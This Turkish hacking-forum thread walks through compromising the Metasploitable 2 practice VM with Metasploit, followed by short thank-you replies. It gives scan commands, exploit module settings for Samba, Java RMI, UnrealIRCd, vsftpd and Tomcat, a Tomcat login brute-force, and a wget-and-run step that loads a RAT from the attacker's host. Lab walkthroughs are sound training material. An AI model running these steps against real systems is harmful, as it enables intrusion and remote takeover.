Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm


Me'tas'ploitable Çözümleri

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 13-06-2017 04:47   #1
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Mantı V2
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 195


Thumbs up Métasploitable Çözümleri



Arkadaşlar Merhaba

Bugün sizlere neredeyse tüm pentesterların kullandığı lab olan Me'tas'ploitable 2 nin çözümlerini anlatacağım.


(Malesef forumda me'tas kelimesine sansür konulduğundan böyle yazmak durumunda kalıyorum. Siz kendiniz ' ı çıkartarak anlayabilirsiniz.)

Enbaşta Me'tas'ploitable nedir?
Rapid7 şirketinin ilk zamanlarda bir hack oyunu olarak çıkarıp daha sonra gerçekten bir hack frameworküne dönüşen me'tas'ploit in uygulandığı yerdir. İçerisinde birsürü açık barındırır ve buda farklı yollardan cihaza sızmamıza olanak sağlar.

İsterseniz başlayalım.
İlk olarak Me'tas'ploitable ile me'tas'ploiti açıyoruz.

(Burada bir araca para vericek durumda olmadığımdan me'tas'ploit-frameworkü kullanıcam [msfconsole])

İlk olarak kullanıcı taramamızı yapıyoruz.
netdiscover -r 192.168.43.1/24



Evet cihazımız belli oldu. 192.168.43.120

{Bu andan itibaren me'tas'ploiti çok kullanıcağımdan ve sansürün etkilememesi için kendimce bir isim takıcam: RIFKI }

Cihazımız belli olduğuna göre artık RIFKImızı açabiliriz.
Artık RIFKImızı açtığımıza göre RIFKInın belli başlı özellik ve uyumluklarını kullanarak bu işlemimizi sürdürcez.




İlk hareket tabikide port taraması yapmak olacaktır.
Ve bunu RIFKIca çözücez.
Şimdi port taraması yapalım.

db_nmap 192.168.43.120



Belli başlı portları önümüze serdi.
Geçenki konumda anlattığım üzere bu portlarda aldatmacalar olabiliyor.
Buyüzden birde versiyon taraması yapacağız.

(eğer port belirtmeden tarama yapmaya kalkışırsam çok uzun sürecektir. Bu yüzden tüm portları belirtiyorum.)
db_nmap -sV -p21,22,23,25,53,80,111,139,445,512,513,514,1099,15 24,2049,2121,3306,5432,5900,6000,6667,8009,8180 192.168.43.120



Çıktı geldiğinde bir crash ile karşılaşıyoruz ama bu bir sıkıntı olmucaktır.
Şimdi bu özelliği bilmeyen kullanıcılarımız neden böyle bir şey yaptığımızı soracaktır.
Bunu yaparak tüm port taramaları ve kullanıcı taramalırını kendi databaseine ekliyor.

services



Böylece başka bir yere not yazmaya gerek kalmadan tek komut satırından halledebiliriz.
Hatta linux komut satırındaki çoğu uygulamayıda bu RIFKIda yapabiliriz.

RIFKInın reklamını yaptığımıza göre devam edelim.
Sponsor olduğu için Rapid7 e teşşekür ediyorum


Servislerimizin versiyonlarına göre artık açık bulucaz

Netbios Açığı

İlk olarak modül arayacağız bunun için ingilizce ara diyoruz.
search samba




Buradaki modüllerden multi/samba/usermap_script i seçiyoruz
use multi/samba/usermap_script



info yazarakta seçtiğiniz modülün bilgilerini öğrenebilirsiniz.
Yukarıdaki ayarlara baktığımızda rhost ve rport isteniyor bizden.
Zaten rport doğru verilmiş değiştirilmicek.
Bizden sadece rhost istiyor.

setg komutunu kullanarak gelecekteki rhost kısımlarına bunu ataması gerktiğini belirtiyorum.
setg rhost 192.168.43.120



Ayarladıktan sonra exploit diyip çalıştırıyoruz.
Burada -j biz işimizi devam ettirelim diye verilmiştir.
exploit -j



Evet sızarak küçük bir shell açtık.
Daha fazlasını isteyenlere güzel bir meslek sırrı vereyim.

Shell i meterpreter e dönüştürerek tam erişimi ele alabiliriz.



Evet böyle rahatlıkla meterpreter oturumu alabiliriz.



Rmiregistry Açığı

Bu açığı kullanmak için java rmi yi kullanacağız.
search java_rmi



Rmi yi exploitlemek için rmi serverı kullanıcaz.
use exploit/multi/misc/java_rmi_server



Burda yavaş yavaş küçük ayrıntıların faydasını görüyoruz.
Biz yazmadan kendisi rhost u vermiş zaten.
Bizede komutu girmek düşer.

exploit



Evet burda bir gariplik var.
Kedndisi bize içeride bir meterpreter açtığını söylüyor.
Ama daha sonrada bunun başarılı olmadığını söyleyip hiç bağlantı kurulmadığını söyledi.
Bizde kontrol etmek için sessions diyerek kontrol ettik ve açılmış olduğunu gördük.




İrc Açığı

Unreal i kullanarak arama yaparsak sonuça hemen erişebiliriz.
search unreal



Zaten 3 sonuç çıktı ve üstüne üstlük bir tanesi excellent olunca hangisini kullanmamız gerektiği apaçık ortada.
use exploit/unix/irc/unreal_ircd_3281_backdoor



Ve hiç birşey yapmadan direk exploit
exploit



Ve shell oturumumuz var.
Bunu yukarıda anlattığım gibi meterpretere dönüştürebilirsiniz.



Ftp Açığı

Ftpde kullanılan program vsfto idi.
Bizde onu kullanarak giricez.

search vsftp



Tabi orada birsürü modül olduğundan seçmekte zorlanıyorum ve backdooru seçiyorum.
use exploit/unix/ftp/vsftpd_234_backdoor



Ve yine hiç bir ayarlama yapmadan komutu veriyoruz.
exploit



Ve bir shell daha açıldı.
İsterseniz dediğimi yapabilirsiniz.




Php Açığı

Evet cihazımızın http servisinde çalışan php nin bir açığını kullanarak giricez.
(Artık yaptığımız işlemleri anladığınızı düşünerek fazla oyalanmadan direk sonucu göstericem)





Shell Açığı

Muhtemelen aralarındaki en kolay açık bu olsa gerek
Yapılcak şey belli.
RIFKInın connect komutunu kullanarak shell portuna bağlanıcaz.
Servislerden shellin çalıştığı portları bulalım.

services



Evet shelimizin portu 1524.
Buna bağlanalım.

connect 192.168.43.120 1524



Yeterince kolay bir şekilde shellimizi elde ettik.
Peki biz bunu nasıl meterpretere dönüştürücez?

Şöyle:

RIFKInın bir aracı olan msfvenomu kullanarak bir linux RATı yaptım ve bunu paylaşılabilir yapmak için apache2 servisimi açtım.



Artık shelime geri dönüp komutlarımı girmem gerek.
wget http://192.168.43.200:80/met.py
chmod +x met.py
python met.py




Diyerek karşı tarafı RATımı indirmesini ve çalıştırması gerektiğini söyledim.
Tabi bunları yaparken başka bir RIFKIdan bu dosyanın bize olan bağlantısını koruyabilmesi için handler çalıştırmam gerek.




Evet handlerımıda çalıştırdıktan sonra shellimde bıraktığım python met.py komutunu giriyorum.
Handlerima baktığımda meterpreter oturumum açılmış durumda oluyor.




Daha Sonradan Eklenenler

Evet konuyu yazdığım andan beri hala açık bulmaya devam ediyordum.
Ve yeni açıklar ile eklenenler kısmından karşınızdayım.



Tomcat Açığı

Diğerki sızmalarda sadece exploit ile giriş yapmıştık bunun nedeni extradan bir şeye gerek duyulmamasıydı.
Şimdi ise daha detaylı olarak sızma girişimi yapıcaz.

Hedefin 8180 portunda http çalışıp arkasındada tomcat çalıştırılıyordu.
Bizde tomcatden yararlanıcaz.
search tomcat




Karşımıza belli başlı auxiliaryler geldi bizede şifre lazım bağlantı kurabilmemiz için.

Çözümü bruteforcede buluyoruz.
use auxiliary/scanner/http/tomcat_mgr_login



Evet modülde rhosts u bizden girmemizi istiyor.
Bizim önceden yaptığımız işlem sadece rhost yazan kısımlara ip adresini girer.
Burda ise birden fazla adres vermeye müsait olduğundan rhosts olarak tanımlanmış.
Kendimiz girmemiz gerek.
Ve saldırıyı yapacağı port adresini 8180 e ayrlıyoruz.

(İsterseniz PASS_FILE USERPASS_FILE USER_FILE yerlerine kendi wordlistinizi koyabilirsiniz.)
Gerekli hazırlıklar tamamlandığına göre run diyerek başlatıyoruz.
run



Yeterince hızlı bir şifre denemesinden sonra şifremizi öğreniyoruz.
Artık şifremizde elimizde olduğuna göre exploitimizi kullanma vakti gelmiş demektir.

Önceden yaptığımız aramadan aldığım deploy exploitini deniyoruz.
use exploit/multi/http/tomcat_mgr_deploy



Evet birkaç değer girmemiz gerekmekte.
set httpusername tomcat
set httppassword tomcat
set rport 8180
set payload java/meterpreter/reverse_tcp
exploit




Güzelinden bir meterpreter açtık.



Evet ben yapabildiklerimi burda paylaştım.

İleriki zamanlarda çözdüklerim olursa konuyu düzenleyip onuda eklerim.
(Ki dahada fazlası olduğunu biliyorum. Bunlar sadece basic seviye giriş yöntemleri.)

Evet konumuzu burada bitirdik.
Eğer beğendiyseniz teşşekkkür etmeyi unutmayınız.
Diğer güzel konularımı görmek içinde şuraya bakabilirsiniz.
http://www.turkhackteam.org/search.p...rchid=10393284

HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.

Konu Belvando tarafından (15-06-2017 21:21 Saat 21:21 ) değiştirilmiştir.. Sebep: Çözüm eklendi
 Offline  
 
Alıntı ile Cevapla
Alt 13-06-2017 11:28   #2
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
04/2016
Mesajlar
Konular

Teşekkür (Etti): 130
Teşekkür (Aldı): 78




Çok Kral Konu Ama Neden İlgi Görmemiş



___________________________________________

Çocuklarınızı Tecavüzcülere Emanet Etmeyin

 Offline  
 
Alıntı ile Cevapla
Alt 13-06-2017 11:35   #3
  • E-Mail onayı yapılmamış üye
  • Üye Bilgileri
Üyelik tarihi
03/2017
Nereden
Roma
Mesajlar
Konular

Teşekkür (Etti): 12
Teşekkür (Aldı): 271




Lanet olsun dostum ileride paylaşacağım tüm konuları tek konuda paylaşmış

Ellerine Sağlık
 Offline  
 
Alıntı ile Cevapla
Alt 13-06-2017 11:41   #4
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
06/2016
Nereden
Kuvvetmira
Mesajlar
Konular

Teşekkür (Etti): 762
Teşekkür (Aldı): 997




Alıntı:
Elezen255´isimli üyeden Alıntı Mesajı göster
Çok Kral Konu Ama Neden İlgi Görmemiş
Burası Turkhackteam.org



___________________________________________



S A G O P A
K A J M E R

 Offline  
 
Alıntı ile Cevapla
Alt 13-06-2017 12:10   #5
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
09/2016
Nereden
/etc/shadow
Mesajlar
Konular

Teşekkür (Etti): 22
Teşekkür (Aldı): 614




Eline sağlık dostum.



___________________________________________

Eski Saldırı Timi Üyesi


sprach.ρнρ
 Offline  
 
Alıntı ile Cevapla
Alt 13-06-2017 12:19   #6
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
03/2016
Nereden
Nereye...
Mesajlar
Konular

Teşekkür (Etti): 70
Teşekkür (Aldı): 16




Ya bi sorum olacak Me'tas'ploitable neden böyle yazıyorsunuz ??



___________________________________________

( ͡° ͜ʖ ͡°)
 Offline  
 
Alıntı ile Cevapla
Alt 13-06-2017 12:33   #7
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
09/2016
Mesajlar
Konular

Teşekkür (Etti): 607
Teşekkür (Aldı): 459




Elinize sağlık. Métasploitable şeklinde de yazabilirsiniz.



___________________________________________

"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
 Offline  
 
Alıntı ile Cevapla
Alt 13-06-2017 12:57   #8
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Mantı V2
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 195




Alıntı:
Elezen255´isimli üyeden Alıntı Mesajı göster
Çok Kral Konu Ama Neden İlgi Görmemiş
Alıntı:
20071999´isimli üyeden Alıntı Mesajı göster
Burası Turkhackteam.org
Çok teşekkür ederim

Alıntı:
HocaXD´isimli üyeden Alıntı Mesajı göster
Lanet olsun dostum ileride paylaşacağım tüm konuları tek konuda paylaşmış

Ellerine Sağlık
Keşke konuyu açmadan önce size sorsaymışşım
Çok sağolun

Alıntı:
Sprachlos´isimli üyeden Alıntı Mesajı göster
Eline sağlık dostum.
Sağolun

Alıntı:
AhmeTHT´isimli üyeden Alıntı Mesajı göster
Ya bi sorum olacak Me'tas'ploitable neden böyle yazıyorsunuz ??
Malesef forumda sansür uygulanıyor, normal yazınca ****sploit böyle bir sonuç vermekte
Bende bu yüzden öyle yazma kararı aldım.

Alıntı:
Pentester´isimli üyeden Alıntı Mesajı göster
Elinize sağlık. Métasploitable şeklinde de yazabilirsiniz.
Önerinizden dolayı çok teşekkür ederim artık bunu uygulayacağım
 Offline  
 
Alıntı ile Cevapla
Alt 13-06-2017 21:53   #9
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Mantı V2
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 195




Yeni çözüm eklemdi
 Offline  
 
Alıntı ile Cevapla
Alt 21-06-2017 00:31   #10
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
06/2017
Yaş
28
Mesajlar
Konular
9

Teşekkür (Etti): 1
Teşekkür (Aldı): 4




Teşekkür Ederim.
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau